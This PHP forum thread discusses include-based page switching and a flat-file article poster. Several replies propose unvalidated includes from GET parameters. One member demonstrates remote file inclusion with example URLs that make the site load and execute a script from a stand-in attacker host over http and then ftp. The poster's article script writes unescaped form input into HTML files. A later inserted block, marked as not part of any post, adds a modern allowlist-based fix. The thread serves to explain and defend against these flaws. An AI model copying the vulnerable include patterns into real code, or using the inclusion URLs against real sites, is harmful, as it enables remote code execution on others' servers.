Extending a single page management script


Mobius Man
Forum Newbie
Posts: 8
Joined: Mon Dec 15, 2003 8:16 pm

Post by Mobius Man »

I've created a script (well, two different ones). The first one is for my index.php page, which is a simple include switch that keeps it to a single page design:

Code: Select all

<?php

ini_set('include_path', 'http://mobius_man.t35.com');
switch ($_GET['page']) {
    case 'articles':
        include('articles.php');
        break;
    case 'contact':
        include('contact.php');
        break;
    case 'spotlight':
        include('spotlight.php');
        break;
    case 'fan':
        include('fan.php');
        break;
    case 'multimedia':
        include('multimedia.php');
        break;
    case 'links':
        include('links.php');
        break;
    case null:
        include('./news/news.txt');
        break;
    default:
        include('error.php');
        break;
}


?>

That works fine. Secondly, I have a script that when I want to create pages for these pages (i.e. index -> articles -> page), it makes links on the selected page (articles.php for example). This is ok as well. The problem is, how can I include these links on the page as I do with the index.php and those branch files?

Basically I want the index ->articles.php ->page linked from articles.php to all be a single-page deal.
McGruff
DevNet Master
Posts: 2893
Joined: Thu Jan 30, 2003 8:26 pm
Location: Glasgow, Scotland

Post by McGruff »

First, dynamic includes might be a better option than a switch / case - can be much quicker with many cases. You'd need to prefix file names for security if you are opening files based on values passed via GET:

Code: Select all

<?php

include('prefix_' . $_GET['page']);

?>
With the null & default cases:

Code: Select all

<?php

function loadPage()
{
    if(is_null($_GET['page']))
    {
        // include .. etc
        return;
    }
    if(!is_file('prefix_' . $_GET['page']))
    {
        // include .. etc
        return;
    }
    include('prefix_' . $_GET['page']);
}
?>
This requires strict file naming conventions, of course.

I couldn't quite understand your query: are you making a front controller? Some recent discussion on this here viewtopic.php?t=15107
Last edited by McGruff on Wed Aug 10, 2005 4:56 am, edited 1 time in total.
Mobius Man
Forum Newbie
Posts: 8
Joined: Mon Dec 15, 2003 8:16 pm

Post by Mobius Man »

Basically I'm trying to make a basic manager using flat files (I have no access to SQL). :(

This is the file that makes the links, and writes the information to the pages:

Code: Select all

<?php
// config.php presumably defines $password and the display settings used further down
include ("news/config.php");
// basename() keeps the article file inside articles/ whatever path is posted
$id = basename($_POST["id"]);
$filename = $id;
$date = date("F j, Y");
$name = $_POST["name"];
$email = $_POST["email"];
$title = $_POST["title"];
$content = $_POST["content"];
$pass = $_POST["password"];

if ($password == $pass)
{

// Prepend a link to the new article to the article index
$filename2 = 'articles.php';

$file = file_get_contents($filename2);
$fp = fopen($filename2, "w");
fwrite($fp, "<a href=articles/$id>$title</a> - $date <br /><br />");
fwrite($fp, $file);
fclose($fp);

chdir("articles");

// Prepend the article to its own file; the file may not exist yet
$file = is_file($filename) ? file_get_contents($filename) : "";
$fp = fopen($filename, "w");
fwrite($fp, "<h1>$title</h1> Posted by: <a href=mailto:$email>$name</a>  $date <br /><br /><br /><br /> $content</font> <br />");
fwrite($fp, $file);

fclose($fp);

?>
<html>
<head>
<title> Page Editor</title>
</head>
<body bgcolor="#6B859C">
<?php echo "<font face=$font size=$fontsize>";
      echo "<center><h2>SUCCESS!!</h2></center>";
      echo "<center>Your news has been successfully posted.<br />";
      echo "Go To: <a href=$websiteurl>$websitename</a> | <a href=page_create.php>Make Another Post</a></center></font>";


?>
</body>
</html>
<?php }
 else {
 echo "Wrong Password <a href=news.php>Try again</a>.";
}
?>
basdog22
Forum Contributor
Posts: 158
Joined: Sun Nov 30, 2003 3:03 pm
Location: Greece

Post by basdog22 »

instead of:

Code: Select all

<?php 

ini_set('include_path', 'http://mobius_man.t35.com'); 
switch ($_GET['page']) {
    case 'articles': 
        include('articles.php'); 
        break; 
    case 'contact': 
        include('contact.php'); 
        break; 
    case 'spotlight': 
        include('spotlight.php'); 
        break; 
    case 'fan': 
        include('fan.php'); 
        break; 
    case 'multimedia': 
        include('multimedia.php'); 
        break; 
    case 'links': 
        include('links.php'); 
        break; 
    case null: 
        include('./news/news.txt'); 
        break; 
    default: 
        include('error.php'); 
        break; 
}


?>
Do this:

Code: Select all

$file = $_GET['page'];
include "$file.php";
easier and safer.... I hope :roll:
DuFF
Forum Contributor
Posts: 495
Joined: Tue Jun 24, 2003 7:49 pm
Location: USA

Post by DuFF »

basdog22 wrote: easier and safer.... I hope :roll:
Easier, but not safer. Anyone could just use the URL query to bring up any PHP file in the directory. Example:

http://mobius_man.t35.com/index.php?page=path/to/secret.php

Mobius Man, could you please explain what your problem is in more detail? I don't understand what you are having problems with.
qads
DevNet Resident
Posts: 1199
Joined: Tue Apr 23, 2002 10:02 am
Location: Brisbane

Post by qads »

you want to edit the files with php? :?
vigge89
Forum Regular
Posts: 875
Joined: Wed Jul 30, 2003 3:29 am
Location: Sweden

Post by vigge89 »

you can use something like this:

Code: Select all

<?php

//Include content
if (isset($_GET['id'])) {
	$id = "".addslashes($_GET['id']).".php";
	if (file_exists($id)) {
		include ($id); //Include chosen page
	}
	else {
		include ("404.php"); //If the file requested does not exist
	}
}
else {
	include ("start.php"); //Default page
}


?>
basdog22
Forum Contributor
Posts: 158
Joined: Sun Nov 30, 2003 3:03 pm
Location: Greece

Post by basdog22 »

Anyone could just use the URL query to bring up any PHP file in the directory
this can be handled with: sessions, referer trick etc :wink:
Weirdan
Moderator
Posts: 5978
Joined: Mon Nov 03, 2003 6:13 pm
Location: Odessa, Ukraine

Post by Weirdan »

DuFF wrote:
basdog22 wrote: easier and safer.... I hope :roll:
Easier, but not safer. Anyone could just use the URL query to bring up any PHP file in the directory.
Even more, it could be used to include the script from remote host:

Code: Select all

http://mobius_man.t35.com/index.php?page=http://evil.weirdan's.host.com/path/to/secret
It will include (and execute) the script from http://evil.weirdan's.host.com/path/to/secret.php.
basdog22
Forum Contributor
Posts: 158
Joined: Sun Nov 30, 2003 3:03 pm
Location: Greece

Post by basdog22 »

http://mobius_man.t35.com/index.php?page=http://evil.weirdan's.host.com/path/to/secret
8O 8O 8O

Never thought of that. thanks weirdan :wink:

but again:

Code: Select all

<?php
if (eregi("http://",$page))
{
 echo "I don't like you!!!";
}
...
..

?>
wouldn't do the trick?
m3mn0n
PHP Evangelist
Posts: 3548
Joined: Tue Aug 13, 2002 3:35 pm
Location: Calgary, Canada

Post by m3mn0n »

lol There is nothing wrong with what he uses, I use the exact same thing. And on most servers I've tested the different page switchers, the difference in script execution is not even a hundredth of a second; so no biggie. And I prefer to define what pages are able to be called instead of allowing anything within a directory, based on the file name. Maybe he does too.

Regarding your article manager, what is wrong with what you're trying to do? And how can we help?
Weirdan
Moderator
Posts: 5978
Joined: Mon Nov 03, 2003 6:13 pm
Location: Odessa, Ukraine

Post by Weirdan »

basdog22 wrote:
http://mobius_man.t35.com/index.php?page=http://evil.weirdan's.host.com/path/to/secret
8O 8O 8O

Never thought of that. thanks weirdan :wink:

but again:

Code: Select all

<?php
if (eregi("http://",$page))
{
 echo "I don't like you!!!";
}
...
..

?>
wouldn't do the trick?
it will. But then I'll change the url to:

Code: Select all

http://mobius_man.t35.com/index.php?page=ftp://evil.weirdan's.host.com/path/to/secret
;)
Use the basename function to get rid of traversals and XSS attacks.
Mobius Man
Forum Newbie
Posts: 8
Joined: Mon Dec 15, 2003 8:16 pm

Post by Mobius Man »

Wow! There's been a lot of posts since I was last on.

Basically, my problem is this. I want to include pages branching from a page off of index.php

For example:

index.php -> articles.php --- this works fine. However...


index.php -> articles.php -> a linked page from articles.php ---

instead of being included on the same page as articles.php, it goes directly to the file. I want everything to stay as it would in index.php.
m3mn0n
PHP Evangelist
Posts: 3548
Joined: Tue Aug 13, 2002 3:35 pm
Location: Calgary, Canada

Post by m3mn0n »

?p=articles which requires articles.php; and within articles.php, you require an article be called from the GET method also. So the URL would be something like ?p=articles&id=2925.
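
Added example (not part of any post in this thread): a front controller for the ?p=articles&id=2925 scheme described above, applying the allowlist and basename advice given earlier in the thread to both parameters and run against the URLs quoted there. The article directory layout, the "<id>.php" file naming and the function names resolveSection and resolveArticle are assumptions.

```php
<?php
// Added example. Assumed layout (not from the thread): section scripts sit
// beside index.php; article files live in one directory, named "<id>.php".
const SECTIONS = ['articles', 'contact', 'spotlight', 'fan', 'multimedia', 'links'];
// Map ?p= to a section script. Only allowlisted names are ever returned.
function resolveSection($p): string
{
    if ($p === null || $p === '') {
        return 'news/news.txt';            // default page, as in the original switch
    }
    // Strict comparison: arrays, traversal strings and URLs never match.
    return in_array($p, SECTIONS, true) ? $p . '.php' : 'error.php';
}

// Map ?id= to a file inside $dir, or null if it does not resolve there.
function resolveArticle($id, string $dir): ?string
{
    // Rejects "../x", "http://...", "ftp://..." and anything with a slash or dot.
    if (!is_string($id) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $id)) {
        return null;
    }
    $base = realpath($dir);
    // basename() is redundant after the pattern check; kept as a second layer.
    $path = realpath($dir . '/' . basename($id) . '.php');
    // realpath() follows symlinks, so confirm the result is still under $dir.
    if ($base === false || $path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo data: a throwaway article directory with one article.
$dir = sys_get_temp_dir() . '/articles_demo';
is_dir($dir) || mkdir($dir);
file_put_contents($dir . '/2925.php', '<h1>Demo article</h1>');

// Constructed queries, including the URLs quoted in the thread.
$queries = [
    ['p' => 'articles', 'id' => '2925'],
    ['p' => 'path/to/secret'],
    ['p' => "http://evil.weirdan's.host.com/path/to/secret"],
    ['p' => 'articles', 'id' => "ftp://evil.weirdan's.host.com/path/to/secret"],
    ['p' => 'articles', 'id' => '../index'],
];
foreach ($queries as $q) {
    $article = isset($q['id']) ? resolveArticle($q['id'], $dir) : null;
    printf("%s\n  section: %s\n  article: %s\n", urldecode(http_build_query($q)),
        resolveSection($q['p'] ?? null), $article ?? 'none');
}
```

In index.php the value returned by resolveSection() is what gets included; articles.php then includes the value from resolveArticle() when id is present. The links written into articles.php point at index.php?p=articles&id=... rather than at the article file, which keeps every request on the single page.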
basdog22
Forum Contributor
Posts: 158
Joined: Sun Nov 30, 2003 3:03 pm
Location: Greece

Post by basdog22 »

weirdan :wink: :wink:

Thanks :D basename rules 8)


i will use it for another script i am working on. you can really play with this one :wink: